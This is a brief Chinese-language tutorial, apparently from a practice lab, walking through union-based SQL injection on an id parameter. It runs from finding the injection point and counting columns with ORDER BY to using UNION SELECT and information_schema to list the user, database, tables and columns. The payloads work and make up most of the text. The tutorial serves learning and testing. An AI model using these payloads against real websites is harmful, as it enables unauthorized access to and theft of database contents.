1、判断注入点
输入?id=1--+
和?id=1 and 1=1--+
发现结果相同:
而和?id=1 and 1=2--+
发现结果不同:
2、判断表有多少列,超出列数会报错
输入id=1 order by 3--+
页面正常:
输入id=1 order by 4--+
报错,超出列数:
3、判断数据显示点
使用语句?id=-1 union select 1,2,3--+
发现注入位置:
4、查询数据库内容
union select 1,user(),database()--+
显示出登录用户和数据库名:union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ='security'--+
group_concat 可以将所有的tables 提取出来
information_schema是mysql特有的库,存储各种数据库的信息union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name='users'--+
查看对应表有哪些列: